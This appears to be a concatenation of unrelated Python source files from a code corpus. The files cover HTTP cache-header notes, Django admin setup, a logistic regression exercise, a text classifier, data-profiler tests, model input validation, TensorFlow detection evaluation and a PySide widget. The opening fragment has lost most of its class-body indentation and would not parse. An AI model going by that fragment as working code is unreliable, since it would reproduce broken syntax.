text = """\
The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy
requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response."""
class STALE_MUST_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a cache, because it is stale."
text = """\
The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy
requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response."""
class FRESH_PROXY_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a shared cache once it becomes stale."
text = """\
The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared
caches (e.g., proxy caches) from using stale responses to satisfy requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response.
These directives do not affect private caches; for example, those in browsers."""
class STALE_PROXY_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a shared cache, because it is stale."
text = """\
The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared
caches (e.g., proxy caches) from using stale responses to satisfy requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response.
These directives do not affect private caches; for example, those in browsers."""
class CHECK_SINGLE(Note):
category = categories.CACHING
level = levels.WARN
summary = "Only one of the pre-check and post-check Cache-Control directives is present."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s uses only one of these directives; as a result, Internet Explorer will ignore the
directive, since it requires both to be present.
See [this blog entry](http://bit.ly/rzT0um) for more information.
"""
class CHECK_NOT_INTEGER(Note):
category = categories.CACHING
level = levels.WARN
summary = "One of the pre-check/post-check Cache-Control directives has a non-integer value."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
Their values are required to be integers, but here at least one is not. As a result, Internet
Explorer will ignore the directive.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_ALL_ZERO(Note):
category = categories.CACHING
level = levels.WARN
summary = "The pre-check and post-check Cache-Control directives are both '0'."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s gives a value of "0" for both; as a result, Internet Explorer will ignore the
directive, since it requires both to be present.
In other words, setting these to zero has **no effect** (besides wasting bandwidth),
and may trigger bugs in some beta versions of IE.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_BIGGER(Note):
category = categories.CACHING
level = levels.WARN
summary = "The post-check Cache-control directive's value is larger than pre-check's."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s assigns a higher value to `post-check` than to `pre-check`; this means that Internet
Explorer will treat `post-check` as if its value is the same as `pre-check`'s.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_ZERO(Note):
category = categories.CACHING
level = levels.BAD
summary = "The post-check Cache-control directive's value is '0'."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s assigns a value of "0" to `post-check`, which means that Internet Explorer will reload
the content as soon as it enters the browser cache, effectively **doubling the load on the server**.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_PRE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s may be refreshed in the background by Internet Explorer."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
Once it has been cached for more than %(post_check)s seconds, a new request will result in the
cached response being served while it is refreshed in the background. However, if it has been
cached for more than %(pre_check)s seconds, the browser will download a fresh response before
showing it to the user.
Note that these directives do not have any effect on other clients or caches.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class DATE_CORRECT(Note):
category = categories.GENERAL
level = levels.GOOD
summary = "The server's clock is correct."
text = """\
HTTP's caching model assumes reasonable synchronisation between clocks on the server and client;
using RED's local clock, the server's clock appears to be well-synchronised."""
class DATE_INCORRECT(Note):
category = categories.GENERAL
level = levels.BAD
summary = "The server's clock is %(clock_skew_string)s."
text = """\
Using RED's local clock, the server's clock does not appear to be well-synchronised.
HTTP's caching model assumes reasonable synchronisation between clocks on the server and client;
clock skew can cause responses that should be cacheable to be considered uncacheable (especially if
their freshness lifetime is short).
Ask your server administrator to synchronise the clock, e.g., using
[NTP](http://en.wikipedia.org/wiki/Network_Time_Protocol Network Time Protocol).
Apparent clock skew can also be caused by caching the response without adjusting the `Age` header;
e.g., in a reverse proxy or Content Delivery network. See [this
paper](http://www2.research.att.com/~edith/Papers/HTML/usits01/index.html) for more information. """
class AGE_PENALTY(Note):
category = categories.GENERAL
level = levels.WARN
summary = "It appears that the Date header has been changed by an intermediary."
text = """\
It appears that this response has been cached by a reverse proxy or Content Delivery Network,
because the `Age` header is present, but the `Date` header is more recent than it indicates.
Generally, reverse proxies should either omit the `Age` header (if they have another means of
determining how fresh the response is), or leave the `Date` header alone (i.e., act as a normal
HTTP cache).
See [this paper](http://j.mp/S7lPL4) for more information."""
class DATE_CLOCKLESS(Note):
    # Emitted when the response has no Date header at all.
    # Fix: corrected typo in the user-facing text ("allowes" -> "allows").
    category = categories.GENERAL
    level = levels.WARN
    summary = "%(response)s doesn't have a Date header."
    text = """\
Although HTTP allows a server not to send a `Date` header if it doesn't have a local clock, this
can make calculation of the response's age inexact."""
class DATE_CLOCKLESS_BAD_HDR(Note):
category = categories.CACHING
level = levels.BAD
summary = "Responses without a Date aren't allowed to have Expires or Last-Modified values."
text = """\
Because both the `Expires` and `Last-Modified` headers are date-based, it's necessary to know when
the message was generated for them to be useful; otherwise, clock drift, transit times between
nodes as well as caching could skew their application."""
|
StarcoderdataPython
|
11235037
|
<reponame>study-abacus/admin-site
from django.contrib import admin
from .models import Student, Course, Fee, Achievement, CI

# Register each model with the default admin site (same order as before)
# so every one gets the auto-generated ModelAdmin interface.
for _model in (Student, Course, Fee, Achievement, CI):
    admin.site.register(_model)
|
StarcoderdataPython
|
9786662
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.5
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %% [markdown]
# # 📝 Exercise M4.05
# In the previous notebook we set `penalty="none"` to disable regularization
# entirely. This parameter can also control the **type** of regularization to use,
# whereas the regularization **strength** is set using the parameter `C`.
# Setting`penalty="none"` is equivalent to an infinitely large value of `C`.
# In this exercise, we ask you to train a logistic regression classifier using the
# `penalty="l2"` regularization (which happens to be the default in scikit-learn)
# to find by yourself the effect of the parameter `C`.
#
# We will start by loading the dataset and create the helper function to show
# the decision separation as in the previous code.
# %% [markdown]
# ```{note}
# If you want a deeper overview regarding this dataset, you can refer to the
# Appendix - Datasets description section at the end of this MOOC.
# ```
# %%
import pandas as pd

penguins = pd.read_csv("../datasets/penguins_classification.csv")
# only keep the Adelie and Chinstrap classes (binary classification task)
penguins = penguins.set_index("Species").loc[
    ["Adelie", "Chinstrap"]].reset_index()

culmen_columns = ["Culmen Length (mm)", "Culmen Depth (mm)"]
target_column = "Species"

# %%
from sklearn.model_selection import train_test_split

# Fixed seed so the train/test split is reproducible across runs.
penguins_train, penguins_test = train_test_split(penguins, random_state=0)

data_train = penguins_train[culmen_columns]
data_test = penguins_test[culmen_columns]

target_train = penguins_train[target_column]
target_test = penguins_test[target_column]

# %% [markdown]
# First, let's create our predictive model.

# %%
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression

# Standardize features before fitting; penalty="l2" is scikit-learn's default.
logistic_regression = make_pipeline(
    StandardScaler(), LogisticRegression(penalty="l2"))

# %% [markdown]
# Given the following candidates for the `C` parameter, find out the impact of
# `C` on the classifier decision boundary. You can import the helper class with
# `from helpers.plotting import DecisionBoundaryDisplay` to plot the decision
# function boundary. Use the method `from_estimator` from this class.

# %%
Cs = [0.01, 0.1, 1, 10]

# Write your code here.

# %% [markdown]
# Look at the impact of the `C` hyperparameter on the magnitude of the weights.

# %%
# Write your code here.
|
StarcoderdataPython
|
317743
|
from werkzeug.serving import run_simple

from webapp import create_app

import sys
from os import path

if __name__ == '__main__':
    # Project root (two levels above this file); appended to sys.path so
    # any local resolvers are importable.
    project_dp = path.dirname(path.dirname(path.realpath(__file__)))
    # Fix: `path.join(project_dp)` with a single argument was a no-op wrapper.
    sys.path.append(project_dp)  # to find any local resolvers

    app = create_app(config_file_path='/opt/loris/etc/loris2.conf')
    # Single-process dev server; debugger and reloader deliberately off.
    run_simple('0.0.0.0', 5004, app, use_debugger=False, use_reloader=False)
|
StarcoderdataPython
|
3290371
|
"""TODO"""
import pandas
import nltk
nltk.download('punkt') # skip if already downloaded
from sklearn.cross_validation import train_test_split
from textblob.classifiers import NaiveBayesClassifier
from arcode import anycode, clean_str
class XcLassify(object):
    """Naive-Bayes text classifier over labelled rows from an Excel sheet.

    Typical workflow: data_from_excel() -> train() -> classify()/benchmark().
    """

    def __init__(self):
        # Underlying NaiveBayesClassifier; created lazily by train().
        self.__cl = None
        # (text, label) tuples produced by data_from_excel().
        self.__traindata = None
        self.__testdata = None

    def _fetch_clean(self, filepath):
        """Read the first two columns of an Excel file and normalise the text.

        Returns a list of (cleaned_text, label) tuples.
        """
        dframe = pandas.read_excel(filepath)
        dframe.iloc[:, 0] = dframe.iloc[:, 0].map(clean_str)
        dframe.iloc[:, 0] = dframe.iloc[:, 0].map(anycode)
        return dframe.iloc[:, 0:2].to_records(index=False).tolist()

    def _split_data(self, datalist, test_ratio):
        """Split `datalist` into cached train/test parts and return both."""
        self.__traindata, self.__testdata = train_test_split(
            datalist, test_size=test_ratio)
        return self.__traindata, self.__testdata

    def data_from_excel(self, filepath, test_ratio=0.24):
        """Load, clean and split a labelled Excel dataset.

        Bug fix: `test_ratio` was previously ignored — a hard-coded 0.2
        was passed to _split_data(); the caller's value is now honoured.
        """
        datalist = self._fetch_clean(filepath)
        return self._split_data(datalist, test_ratio)

    def train(self, update=False, new_data=None):
        """Fit the classifier, or incrementally update it with `new_data`."""
        if update and new_data:
            self.__cl.update(new_data)
        else:
            self.__cl = NaiveBayesClassifier(self.__traindata)

    def classify(self, text):
        """Clean `text` the same way as the training data, return its label."""
        text = clean_str(text, post_func=anycode)
        return self.__cl.classify(text)

    def benchmark(self, show_best_features=False):
        """Print held-out accuracy; optionally show informative features."""
        print('\nAccuracy: %0.3f\n' % self.__cl.accuracy(self.__testdata))
        if show_best_features:
            self.__cl.show_informative_features()
# test area: quick smoke run on the sample workbook when executed directly
if __name__ == '__main__':
    XCL = XcLassify()
    XCL.data_from_excel('data/data_sample.xlsx')
    XCL.train()
    print(XCL.classify("الباقة خلصت وسحب من الرصيد بدون اخطار قبلها!"))
    print(XCL.classify("ازاى اجدد باقة النت قبل ميعادها؟"))
    print(XCL.classify("لو سمحت عاوز اقدم شكوى فى الفرع"))
    XCL.benchmark(show_best_features=True)
# removed dead `else: pass` branch — it had no effect when imported as a module
|
StarcoderdataPython
|
8067997
|
import unittest
from unittest import mock
from collections import defaultdict
import pandas as pd
from data_profiler.profilers.unstructured_data_labeler_column_profile import UnstructuredDataLabelerProfile
class TestUnstructuredDataLabelerProfile(unittest.TestCase):
    """Tests entity counting and percentage statistics of UnstructuredDataLabelerProfile."""
    def test_char_level_counts(self):
        """Char-level entity counts and char_sample_size after a single update."""
        # setting up objects/profile
        default = UnstructuredDataLabelerProfile()
        sample = pd.Series(["abc123", "Bob", "!@##$%"])
        # running update
        default.update(sample)
        # now getting entity_counts to check for proper structure
        self.assertEqual(
            {'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6},
            default.profile["entity_counts"]["true_char_level"])
        self.assertEqual(
            {'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6},
            default.profile["entity_counts"]["postprocess_char_level"],)
        # assert it's not empty for now
        self.assertIsNotNone(default.profile)
        # then assert that correctly counted number of char samples
        self.assertEqual(default.char_sample_size, 15)
    def test_advanced_sample(self):
        """True-char-level counts on a sample mixing PII entity types."""
        # setting up objects/profile
        default = UnstructuredDataLabelerProfile()
        sample = pd.Series(
            ["Help\t<NAME>\tneeds\tfood.\tPlease\tCall\t555-301-1234."
             "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912."
             "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
        # running update
        default.update(sample)
        # now getting entity_counts to check for proper structure
        self.assertEqual(
            {'BACKGROUND': 106, 'PERSON': 8, 'PHONE_NUMBER': 12, 'SSN': 20,
             'BAN': 18, 'INTEGER': 3, 'ADDRESS': 3},
            default.profile["entity_counts"]["true_char_level"])
        # assert it's not empty for now
        self.assertIsNotNone(default.profile)
    def test_word_level_NER_label_counts(self):
        """Word-level entity counts after a single update."""
        # setting up objects/profile
        default = UnstructuredDataLabelerProfile()
        sample = pd.Series(
            ["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234."
             "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000049939232194912."
             "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
        # running update
        default.update(sample)
        # now getting entity_counts to check for proper structure
        self.assertEqual(
            {'BACKGROUND': 23,'PHONE_NUMBER': 1, 'SSN': 2, 'BAN': 1},
            default.profile["entity_counts"]["word_level"])
        # assert it's not empty for now
        self.assertIsNotNone(default.profile)
    def test_statistics(self):
        """Percentages, sample sizes, and accumulation across two updates."""
        # setting up objects/profile
        default = UnstructuredDataLabelerProfile()
        sample = pd.Series(
            ["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234."
             "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912."
             "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
        background_word_level_percent = 0.85185
        background_true_char_level_percent = 0.62352
        background_postprocess_level_percent = 0.705882
        # running update
        default.update(sample)
        self.assertAlmostEqual(
            background_word_level_percent,
            default.entity_percentages['word_level']['BACKGROUND'],
            3)
        self.assertAlmostEqual(
            background_true_char_level_percent,
            default.entity_percentages['true_char_level']['BACKGROUND'],
            3)
        self.assertAlmostEqual(
            background_postprocess_level_percent,
            default.entity_percentages['postprocess_char_level']['BACKGROUND'],
            3)
        self.assertEqual(27, default.word_sample_size)
        self.assertEqual(170, default.char_sample_size)
        self.assertEqual(
            23, default.entity_counts['word_level']['BACKGROUND'])
        self.assertEqual(
            106, default.entity_counts['true_char_level']['BACKGROUND'])
        self.assertEqual(
            120, default.entity_counts['postprocess_char_level']['BACKGROUND'])
        self.assertIsNone(default._get_percentages('WRONG_INPUT'))
        # second update: counts must accumulate, not reset
        default.update(sample)
        self.assertEqual(54, default.word_sample_size)
        self.assertEqual(340, default.char_sample_size)
    @mock.patch('data_profiler.profilers.'
                'unstructured_data_labeler_column_profile.DataLabeler')
    @mock.patch('data_profiler.profilers.'
                'unstructured_data_labeler_column_profile.'
                'CharPostprocessor')
    def test_profile(self, processor_class_mock, model_class_mock):
        """profile dict structure/timing with the labeler and postprocessor mocked out."""
        # setup mocks
        model_mock = mock.Mock()
        model_mock.reverse_label_mapping = {1: 'BACKGROUND'}
        model_mock.predict.return_value = dict(pred=[[1]])
        model_class_mock.return_value = model_mock
        processor_mock = mock.Mock()
        processor_mock.process.return_value = dict(pred=[[]])
        processor_class_mock.return_value = processor_mock
        # initialize labeler profile
        default = UnstructuredDataLabelerProfile()
        sample = pd.Series(["a"])
        expected_profile = dict(
            entity_counts={
                'postprocess_char_level': defaultdict(int, {'BACKGROUND': 1}),
                'true_char_level': defaultdict(int, {'BACKGROUND': 1}),
                'word_level': defaultdict(int)
            },
            times=defaultdict(float, {'data_labeler_predict': 1.0})
        )
        # fake clock: each time.time() call pops the next descending value,
        # so the measured predict duration is exactly 1.0s
        time_array = [float(i) for i in range(4, 0, -1)]
        with mock.patch('time.time', side_effect=lambda: time_array.pop()):
            default.update(sample)
            profile = default.profile
            # key and value populated correctly
            self.assertDictEqual(expected_profile, profile)
if __name__ == '__main__':
    # Run the test suite when this module is executed directly.
    unittest.main()
|
StarcoderdataPython
|
6555466
|
import numpy as np
import pandas as pd
from pydantic import ValidationError
from regression_model.config.core import config
from regression_model.processing.schemas import MultipleHouseDataInputs
def drop_na_inputs(*, input_data: pd.DataFrame) -> pd.DataFrame:
    """Drop rows with NA values in features the pipeline cannot impute.

    Features whose missing values were already observed during training are
    left untouched; only rows missing values in *other* features are removed.
    """
    cfg = config.model_config
    # Features whose NA values the trained pipeline already knows how to handle.
    known_na_vars = (
        cfg.categorical_vars_with_na_frequent
        + cfg.categorical_vars_with_na_missing
        + cfg.numerical_vars_with_na
    )
    # Any other feature with at least one missing value is unprocessable.
    unexpected_na_vars = []
    for feature in cfg.features:
        if feature in known_na_vars:
            continue
        if input_data[feature].isnull().sum() > 0:
            unexpected_na_vars.append(feature)
    # Drop the offending rows only.
    return input_data.dropna(axis=0, subset=unexpected_na_vars)
def validate_inputs(*, input_data: pd.DataFrame) -> tuple:
    """Check model inputs for unprocessable values.

    Returns:
        A ``(validated_data, errors)`` tuple where ``errors`` is ``None`` on
        success or a JSON string describing pydantic validation failures.
        (Fixed: the annotation previously claimed a bare ``pd.DataFrame``
        even though a 2-tuple has always been returned.)
    """
    selected_features = config.model_config.features
    validated_data = input_data.rename(columns=config.model_config.variables_to_rename)
    validated_data = validated_data[selected_features].copy()
    validated_data = drop_na_inputs(input_data=validated_data)
    # MSSubClass is numeric in the raw data but is modelled as categorical.
    validated_data["MSSubClass"] = validated_data["MSSubClass"].astype("O")
    errors = None
    try:
        # Replace numpy nans so that pydantic can validate
        MultipleHouseDataInputs(
            inputs=validated_data.replace({np.nan: None}).to_dict(orient="records")
        )
    except ValidationError as e:
        errors = e.json()
    return validated_data, errors
|
StarcoderdataPython
|
12836019
|
# Copyright 2017 Tensorflow. All Rights Reserved.
# Modifications copyright 2018 <NAME>/<NAME> & <NAME>
# We follow the object detection API of Tensorflow
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import csv
import numpy as np
import tensorflow as tf
import _init_paths
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
from object_detection.utils import metrics
from object_detection.utils import object_detection_evaluation as obj_eval
from object_detection.core import standard_fields
from skvideo.io import FFmpegWriter
from skimage.io import imread
# ---- Command-line configuration --------------------------------------------
tf.app.flags.DEFINE_string('gt_dir', '', 'Location of root directory for the '
'ground truth data. Folder structure is assumed to be:'
'<gt_dir>/cstopp_train.tfrecord,'
'<gt_dir>/cstopp_test.tfrecord'
'<gt_dir>/cstopp_val.tfrecord')
tf.app.flags.DEFINE_string('det_dir', '', 'Location of root directory for the '
'inference data. Folder structure is assumed to be:'
'<det_dir>/cstopp_train.tfrecord,'
'<det_dir>/cstopp_test.tfrecord'
'<det_dir>/cstopp_val.tfrecord')
tf.app.flags.DEFINE_string('output_dir', '', 'Path to which metrics'
'will be written.')
tf.app.flags.DEFINE_string('split', 'train', 'Data split when record file is being read from gt_dir and det_dir ex: train, test, val')
tf.app.flags.DEFINE_string(
	'label_map_path',
	'configs/cstopp_label_map.pbtxt',
	'file path for the labels')
tf.app.flags.DEFINE_integer(
	'num_class', 1,
	'Number of Classes to consider from 1 in the label map')
tf.app.flags.DEFINE_boolean(
	'is_vout', False, 'Generate a video with bounding boxes')
FLAGS = tf.app.flags.FLAGS
# Per-record features stored in the ground-truth TFRecord files.
gt_feature = {
	'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
	'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
	'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
	'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
	'image/object/class/label': tf.VarLenFeature(tf.int64),
	'image/filename': tf.FixedLenFeature([], tf.string),
	'image/object/difficult': tf.VarLenFeature(tf.int64),
}
# Per-record features in the detection TFRecords; detections additionally
# carry a confidence score and have no 'difficult' flag.
det_feature = {
	'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),
	'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),
	'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),
	'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),
	'image/object/class/label': tf.VarLenFeature(tf.int64),
	'image/object/score': tf.VarLenFeature(tf.float32),
	'image/filename': tf.FixedLenFeature([], tf.string),
}
class Reader:
	"""Sequential TFRecord reader with its own graph and session (TF1 queue API)."""
	def __init__(self, record_path, split, is_infer=False):
		"""Open cstopp_{split}.tfrecord (or cstopp_inference_{split}.tfrecord) and count records."""
		data_path = []
		if is_infer:
			data_path.append(os.path.join(record_path, 'cstopp_inference_{}.tfrecord'.format(split)))
		else:
			data_path.append(os.path.join(record_path, 'cstopp_{}.tfrecord'.format(split)))
		self.read_graph = tf.Graph()
		with self.read_graph.as_default():
			# old_graph_def = tf.GraphDef()
			self.filename_queue = tf.train.string_input_producer(data_path)
			self.reader = tf.TFRecordReader()
			# Pre-count records so callers can iterate exactly num_records times.
			self.num_records = 0
			for f in data_path:
				self.num_records += sum(1 for _ in tf.python_io.tf_record_iterator(f))
			# tf.import_graph_def(old_graph_def, name='')
		self.sess = tf.Session(graph=self.read_graph)
	def get_field(self, field, decode=False):
		"""Return the parsed tensor for `field`, densifying sparse tensors;
		with decode=True the field is treated as a PNG-encoded image."""
		if not decode:
			if type(self.features[field])==tf.SparseTensor:
				return tf.sparse_tensor_to_dense(self.features[field])
			else:
				return self.features[field]
		else:
			return tf.image.decode_png(self.features[field])
	def get_fields(self, feature_dict):
		"""Read the next record and return {feature name: evaluated value}.

		NOTE(review): this adds parse ops to the graph on every call, so the
		graph grows with each record read — acceptable for one-off evaluation.
		"""
		# Modify graph to add these ops
		with self.read_graph.as_default():
			list_fields = feature_dict.keys()
			# old_graph_def = tf.GraphDef()
			# Read next record from queue
			_, serialized_example = self.reader.read(self.filename_queue)
			self.features = tf.parse_single_example(
				serialized_example, features=feature_dict)
			# Get required fields from record
			fields_out = [self.get_field(f) for f in list_fields]
			# Close queue
			coord = tf.train.Coordinator()
			threads = tf.train.start_queue_runners(sess=self.sess, coord=coord)
			# Import updated graph in current read_graph
			# tf.import_graph_def(old_graph_def, name='')
			eval_out = self.sess.run(fields_out)
			out_dict = dict(zip(list_fields, eval_out))
			return out_dict
def get_bbox(box_list):
	"""Stack per-coordinate lists into an (N, 4) array of [ymin, xmin, ymax, xmax] rows."""
	coords = [box_list['image/object/bbox/' + key]
		for key in ('ymin', 'xmin', 'ymax', 'xmax')]
	return np.vstack(coords).T
def write_metrics(metrics, output_path):
	"""Write metrics to a CSV file, one (name, value) row per metric.
	Args:
	metrics: A dictionary containing metric names and values.
	output_path: Path of the CSV file the metrics are written to.
	"""
	tf.logging.info('Writing metrics.')
	with open(output_path, 'w') as csvfile:
		metrics_writer = csv.writer(csvfile, delimiter=',')
		for metric_name, metric_value in metrics.items():
			metrics_writer.writerow([metric_name, str(metric_value)])
# NOTE(review): the FLAGS.* defaults below are evaluated once at function
# definition time, i.e. before flags are parsed — callers (as in __main__)
# should pass every argument explicitly. Verify before relying on defaults.
def evaluate(gt_dir=FLAGS.gt_dir, det_dir=FLAGS.det_dir,
		output_dir=FLAGS.output_dir, split='train',
		label_map_path=None, is_vout=False, num_class=1, fps_out=5):
	"""Compare ground-truth and detection TFRecords, write metrics CSV,
	and optionally render an annotated video of both box sets.

	Args:
		gt_dir/det_dir: roots containing the ground-truth / inference records.
		output_dir: destination for cstopp_{split}_eval.csv (and the video).
		split: record split name ('train', 'test', 'val').
		label_map_path: label-map .pbtxt used to build category metadata.
		is_vout: when True, also writes <split>_det_gt.mp4 at fps_out fps.
		num_class: number of classes (ids 1..num_class) read from the label map.
	"""
	gt_reader = Reader(gt_dir, split)
	num_records = gt_reader.num_records
	det_reader = Reader(det_dir, split, is_infer=True)
	label_map = label_map_util.load_labelmap(label_map_path)
	categories = label_map_util.convert_label_map_to_categories(
		label_map,
		max_num_classes=num_class,
		use_display_name=True)
	evaluator = obj_eval.ObjectDetectionEvaluator(categories)
	output_path = os.path.join(output_dir, 'cstopp_{}_eval.csv'.format(split))
	if is_vout:
		category_index = label_map_util.create_category_index(categories)
		list_valid_ids = [int(cat_dict['id']) for cat_dict in categories]
		vwriter = FFmpegWriter(os.path.join(output_dir,split+'_det_gt.mp4'),
			inputdict={'-r':str(fps_out)},
			outputdict={'-r':str(fps_out)})
	# Records are consumed sequentially; gt and det files are assumed to be
	# aligned record-for-record (keyed by the shared image filename).
	for image_num in range(0, num_records):
		print('Evaluating {}/{}'.format(image_num+1,num_records))
		gt_fields = gt_reader.get_fields(gt_feature)
		gt_bbox = get_bbox(gt_fields)
		gt_classes = gt_fields['image/object/class/label'].astype(np.int32)
		gt_diff = gt_fields['image/object/difficult']
		det_fields = det_reader.get_fields(det_feature)
		det_bbox = get_bbox(det_fields)
		det_scores = det_fields['image/object/score']
		det_classes = det_fields['image/object/class/label'].astype(np.int32)
		filename = gt_fields['image/filename']
		ground_dict = {
			standard_fields.InputDataFields.groundtruth_boxes: gt_bbox,
			standard_fields.InputDataFields.groundtruth_classes: gt_classes,
			standard_fields.InputDataFields.groundtruth_difficult: gt_diff}
		det_dict = {
			standard_fields.DetectionResultFields.detection_boxes: det_bbox,
			standard_fields.DetectionResultFields.detection_scores: det_scores,
			standard_fields.DetectionResultFields.detection_classes: det_classes}
		if is_vout:
			image = imread(filename)
			# Visualization of the results of a detection.
			image_labeled = np.copy(image)
			vis_util.visualize_boxes_and_labels_on_image_array(
				image_labeled,
				gt_bbox,
				gt_classes,
				None,
				category_index,
				max_boxes_to_draw=None,
				min_score_thresh=0,
				use_normalized_coordinates=True,
				line_thickness=2)
			# Only draw detections whose class id is in the label map.
			idx_consider = [cid in list_valid_ids for cid in det_classes]
			vis_util.visualize_boxes_and_labels_on_image_array(
				image_labeled,
				det_bbox[idx_consider,:],
				det_classes[idx_consider],
				det_scores[idx_consider],
				category_index,
				max_boxes_to_draw=None,
				min_score_thresh=0,
				use_normalized_coordinates=True,
				line_thickness=2)
			vwriter.writeFrame(image_labeled)
		evaluator.add_single_ground_truth_image_info(filename, ground_dict)
		evaluator.add_single_detected_image_info(filename, det_dict)
	eval_result = evaluator.evaluate()
	print(eval_result)
	write_metrics(eval_result, output_path)
	if is_vout:
		vwriter.close()
if __name__ == '__main__':
	# All flag values are forwarded explicitly; fps_out keeps its default of 5.
	evaluate(
		gt_dir=FLAGS.gt_dir,
		det_dir=FLAGS.det_dir,
		output_dir=FLAGS.output_dir,
		split=FLAGS.split,
		label_map_path=FLAGS.label_map_path,
		is_vout=FLAGS.is_vout,
		num_class=FLAGS.num_class)
|
StarcoderdataPython
|
6618062
|
<reponame>heylenz/python27<gh_stars>10-100
#!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2004-2005 Trolltech AS. All rights reserved.
##
## This file is part of the example classes of the Qt Toolkit.
##
## This file may be used under the terms of the GNU General Public
## License version 2.0 as published by the Free Software Foundation
## and appearing in the file LICENSE.GPL included in the packaging of
## this file. Please review the following information to ensure GNU
## General Public Licensing requirements will be met:
## http://www.trolltech.com/products/qt/opensource.html
##
## If you are unsure which license is appropriate for your use, please
## review the following information:
## http://www.trolltech.com/products/qt/licensing.html or contact the
## sales department at <EMAIL>.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import random
from PySide import QtCore, QtGui
import tooltips_rc
class ShapeItem(object):
    """A drawable shape: painter path, canvas position, fill color, tooltip text."""
    def __init__(self):
        self.myPath = QtGui.QPainterPath()    # outline used for drawing and hit-testing
        self.myPosition = QtCore.QPoint()     # top-left offset on the canvas
        self.myColor = QtGui.QColor()         # fill color
        self.myToolTip = ''                   # text shown on hover
    def path(self):
        """Return the shape's painter path."""
        return self.myPath
    def position(self):
        """Return the shape's canvas position."""
        return self.myPosition
    def color(self):
        """Return the shape's fill color."""
        return self.myColor
    def toolTip(self):
        """Return the shape's tooltip text."""
        return self.myToolTip
    def setPath(self, path):
        self.myPath = path
    def setToolTip(self, toolTip):
        self.myToolTip = toolTip
    def setPosition(self, position):
        self.myPosition = position
    def setColor(self, color):
        self.myColor = color
class SortingBox(QtGui.QWidget):
    """Widget holding draggable circle/square/triangle items with tooltips."""
    # Counters shared by all instances; used to number newly created shapes.
    circle_count = square_count = triangle_count = 1
    def __init__(self):
        super(SortingBox, self).__init__()
        self.circlePath = QtGui.QPainterPath()
        self.squarePath = QtGui.QPainterPath()
        self.trianglePath = QtGui.QPainterPath()
        self.shapeItems = []
        self.previousPosition = QtCore.QPoint()
        self.setMouseTracking(True)
        self.setBackgroundRole(QtGui.QPalette.Base)
        self.itemInMotion = None
        self.newCircleButton = self.createToolButton("New Circle",
                QtGui.QIcon(':/images/circle.png'), self.createNewCircle)
        self.newSquareButton = self.createToolButton("New Square",
